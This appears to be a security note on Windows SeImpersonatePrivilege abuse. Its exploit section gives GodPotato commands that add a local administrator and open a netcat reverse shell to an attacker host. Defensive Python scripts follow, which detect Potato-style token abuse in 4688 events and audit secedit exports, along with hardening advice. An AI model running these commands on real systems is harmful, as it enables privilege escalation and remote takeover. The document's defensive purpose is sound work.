SeImpersonatePrivilege Abuse

Table of contents

  1. Exploit
  2. Recommendations

Exploit

The example below uses GodPotato. SeImpersonatePrivilege can also be leveraged with JuicyPotato, PrintSpoofer, RoguePotato, and SharpEfsPotato.

# Check whether SeImpersonatePrivilege is enabled for the current user.
whoami /priv

# Execute a command as NT AUTHORITY\SYSTEM.
# $username, $password, $lhost and $lport are PowerShell variables that must be set beforehand.
.\GodPotato.exe -cmd "net user $username $password /add; net localgroup administrators $username /add"
.\GodPotato.exe -cmd "nc.exe $lhost $lport -e cmd"
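From the detection side, the trace these tools leave is a process whose creator is a service account (an IIS app pool identity, a virtual service account, NETWORK SERVICE) but whose token belongs to SYSTEM. The following is an added example, not part of the original notes or of GodPotato: a heuristic that scans Windows Security event 4688 (process creation) records, assumed here to be dicts keyed like the event's EventData fields (SubjectUserName, TargetUserName, NewProcessName, ParentProcessName), and flags a non-SYSTEM creator that produced a SYSTEM-token process. The sample events are constructed.

```python
"""Heuristic detection of Potato-style token abuse in Windows 4688 events.

Assumption (added example): records are dicts keyed like the EventData fields
of Security event 4688. The Target Subject fields are only populated when the
new process runs under a different token than its creator, which is exactly
the pattern SeImpersonatePrivilege abuse produces. Sample data is constructed.
"""

SYSTEM_ACCOUNTS = {("NT AUTHORITY", "SYSTEM")}

# Principals that normally hold SeImpersonatePrivilege and are therefore the
# usual starting point for this abuse (creators, not victims).
SERVICE_DOMAINS = {"IIS APPPOOL", "NT SERVICE"}
SERVICE_ACCOUNTS = {("NT AUTHORITY", "NETWORK SERVICE"),
                    ("NT AUTHORITY", "LOCAL SERVICE")}


def is_system(domain, user):
    return (domain.upper(), user.upper()) in SYSTEM_ACCOUNTS


def is_service_account(domain, user):
    d, u = domain.upper(), user.upper()
    return d in SERVICE_DOMAINS or (d, u) in SERVICE_ACCOUNTS


def classify(event):
    """Return a severity string for a suspicious 4688 record, else None."""
    if event.get("EventID") != 4688:
        return None
    subj = (event.get("SubjectDomainName", ""), event.get("SubjectUserName", ""))
    tgt = (event.get("TargetDomainName", ""), event.get("TargetUserName", ""))
    # No target subject, or a creator that is already SYSTEM: nothing to see.
    if not tgt[1] or not is_system(*tgt) or is_system(*subj):
        return None
    if is_service_account(*subj):
        return "high"    # service account minted a SYSTEM process: Potato pattern
    return "medium"      # any other non-SYSTEM creator producing a SYSTEM token


def scan(events):
    """Return (severity, creator, new_process) for every suspicious event."""
    hits = []
    for e in events:
        sev = classify(e)
        if sev:
            creator = f"{e['SubjectDomainName']}\\{e['SubjectUserName']}"
            hits.append((sev, creator, e["NewProcessName"]))
    return hits


# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    {   # benign: services.exe (already SYSTEM) starts a service host
        "EventID": 4688, "SubjectDomainName": "NT AUTHORITY", "SubjectUserName": "SYSTEM",
        "NewProcessName": r"C:\Windows\System32\svchost.exe",
        "ParentProcessName": r"C:\Windows\System32\services.exe",
        "TargetDomainName": "", "TargetUserName": "",
    },
    {   # benign: interactive user opens a shell under their own token
        "EventID": 4688, "SubjectDomainName": "CORP", "SubjectUserName": "alice",
        "NewProcessName": r"C:\Windows\System32\cmd.exe",
        "ParentProcessName": r"C:\Windows\explorer.exe",
        "TargetDomainName": "", "TargetUserName": "",
    },
    {   # suspicious: an IIS app pool identity creates cmd.exe running as SYSTEM
        "EventID": 4688, "SubjectDomainName": "IIS APPPOOL", "SubjectUserName": "DefaultAppPool",
        "NewProcessName": r"C:\Windows\System32\cmd.exe",
        "ParentProcessName": r"C:\Windows\Temp\GodPotato.exe",   # constructed path
        "TargetDomainName": "NT AUTHORITY", "TargetUserName": "SYSTEM",
    },
    {   # a different event ID is ignored even if its fields look alarming
        "EventID": 4624, "SubjectDomainName": "CORP", "SubjectUserName": "bob",
        "NewProcessName": "", "ParentProcessName": "",
        "TargetDomainName": "NT AUTHORITY", "TargetUserName": "SYSTEM",
    },
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(hit)
```

The rule fires on the token transition rather than on the tool name, so it also covers the other Potato variants and PrintSpoofer listed above; tuning consists of extending the creator allowlist for hosts where a service legitimately spawns SYSTEM processes.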

Recommendations

  • Remove SeImpersonatePrivilege ("Impersonate a client after authentication" under User Rights Assignment) from domain and local user accounts.
  • Deploy EDR on Windows hosts to detect and block GodPotato-style exploits.
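Acting on the first recommendation starts with knowing who currently holds the right. As an added example (not part of the original notes), the script below parses the [Privilege Rights] section of a local policy export as produced by `secedit /export /cfg <file> /areas USER_RIGHTS`, where SIDs are written with a leading `*`, and reports every holder of SeImpersonatePrivilege that is not one of the Windows defaults (Administrators, LOCAL SERVICE, NETWORK SERVICE, SERVICE). The export text and the extra SIDs in it are constructed; `load_export` assumes the UTF-16 encoding secedit writes.

```python
"""Audit SeImpersonatePrivilege holders from a secedit export (added example).

Assumptions: the text follows the .inf layout of `secedit /export /cfg`,
SIDs are prefixed with '*', and account names appear without a prefix.
The sample export below is constructed, including the non-default entries.
"""

# Windows default holders of SeImpersonatePrivilege (well-known SIDs).
DEFAULT_HOLDERS = {
    "S-1-5-32-544": "BUILTIN\\Administrators",
    "S-1-5-19": "NT AUTHORITY\\LOCAL SERVICE",
    "S-1-5-20": "NT AUTHORITY\\NETWORK SERVICE",
    "S-1-5-6": "NT AUTHORITY\\SERVICE",
}


def parse_privilege_rights(text):
    """Return {privilege_name: [principals]} from the [Privilege Rights] section."""
    rights, in_section = {}, False
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("["):
            in_section = line.lower() == "[privilege rights]"
            continue
        if not in_section or "=" not in line:
            continue
        name, _, value = line.partition("=")
        # Strip the '*' SID marker so SIDs compare cleanly against the baseline.
        principals = [p.strip().lstrip("*") for p in value.split(",") if p.strip()]
        rights[name.strip()] = principals
    return rights


def audit_impersonate(text, extra_allowed=()):
    """Return SeImpersonatePrivilege holders outside the default baseline.

    extra_allowed lets a host-specific service identity be accepted, e.g. a
    database or web service that genuinely needs to impersonate clients.
    """
    holders = parse_privilege_rights(text).get("SeImpersonatePrivilege", [])
    allowed = set(DEFAULT_HOLDERS) | set(extra_allowed)
    return [h for h in holders if h not in allowed]


def load_export(path, extra_allowed=()):
    """Audit a real export file; secedit writes it as UTF-16 with a BOM."""
    with open(path, encoding="utf-16") as f:
        return audit_impersonate(f.read(), extra_allowed)


# Constructed sample: defaults plus a domain SID and a named domain account.
SAMPLE_EXPORT = """\
[Unicode]
Unicode=yes
[Privilege Rights]
SeImpersonatePrivilege = *S-1-5-19,*S-1-5-20,*S-1-5-32-544,*S-1-5-6,*S-1-5-21-1111111111-2222222222-3333333333-1105,CORP\\svc_web
SeAssignPrimaryTokenPrivilege = *S-1-5-19,*S-1-5-20
[Version]
signature="$CHICAGO$"
Revision=1
"""

if __name__ == "__main__":
    for principal in audit_impersonate(SAMPLE_EXPORT):
        print("non-default SeImpersonatePrivilege holder:", principal)
```

Anything the audit reports is a candidate either for removal from the user right or for the EDR watch-list in the second recommendation; service identities that legitimately need the right can be passed in `extra_allowed` so the check stays quiet on known-good hosts.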